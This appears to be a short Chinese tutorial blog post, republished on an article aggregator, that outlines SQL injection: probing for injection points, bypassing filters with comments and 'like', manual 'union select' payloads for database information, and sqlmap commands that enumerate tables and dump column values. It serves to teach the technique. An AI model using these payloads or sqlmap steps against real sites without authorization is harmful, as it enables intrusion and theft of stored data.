首页
Web开发
Windows程序
编程语言
数据库
移动开发
系统相关
微信
其他好文
会员
首页
>
数据库
> 详细
sql注入
时间:
2019-05-12 15:36:45
阅读:
131
评论:
0
收藏:
0
[点我收藏+]
标签:
数据
col
select
python
信息
取数
md5
字段
手工
一、步骤
判断是否存在注入,注入是字符型还是数字型
猜解sql查询语句中的字段数
确定显示的字段顺序
获取当前数据库
获取数据库中的表
获取表中的字段名
下载数据
工具:sqlmap
二、寻找注入点
输入的字段作为string,用单引号或双引号来判断
’
输入的字段作为数值型,此时没有字段两边引号,也适用于没有错误回显(盲注)
id=1 and 1=1和id=1 and 1=2
id=1 or 1
id=-1
三、过滤
空格被过滤,可以用/**/(注释)替换
=被过滤,可以用like替换
四、手工注入
判断字段数: order by 数字
判断回显位置:union select 1,2,3,4...
判断数据库信息:union select database(),user(),version(),...
五、编码
url编码
md5编码
base64编码
六、sqlmap
python sqlmap.py -u "url" //查询是否存在注入点
python sqlmap.py -u "url" --tamper "base64encode.py" //使用base64编码
python sqlmap.py -u "url" --dbs //查询数据库
python sqlmap.py -u "url" -D dbname --tables //查询表
python sqlmap.py -u "url" -D dbname --tables --columns //查询字段名
python sqlmap.py -u "url" --dump -T tablename -C "字段名" //获取字段的值
sql注入
标签:
数据
col
select
python
信息
取数
md5
字段
手工
原文地址:https://www.cnblogs.com/ruowei/p/10852200.html
踩
(
0
)
赞
(
0
)
举报
评论
一句话评论(
0
)
登录后才能评论!
分享档案
更多>
2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)
周排行
更多
数据库进阶
2021-07-29
在 Oracle 数据库中执行 SQL 语句遇到特殊字符的转义方式
2021-07-28
Windows Logstash同步 Sqlserver 到Elasticsearch
2021-07-26
mysql数据库(11):恢复数据
2021-07-26
mysql数据库(9):常用查询的例子
2021-07-26
SQLAlchemy 多对多
2021-07-26
ClickHouse的JDBC连接
2021-07-26
Apache HBase 1.7.1 发布,分布式数据库
2021-07-26
数据库常用架构和同步工作原理
2021-07-26
MySQL数据库设计规范(仅供参考)
2021-07-26
友情链接
兰亭集智
国之画
百度统计
站长统计
阿里云
chrome插件
新版天听网
关于我们
-
联系我们
-
留言反馈
© 2014
mamicode.com
版权所有 联系我们:gaon5@hotmail.com
迷上了代码!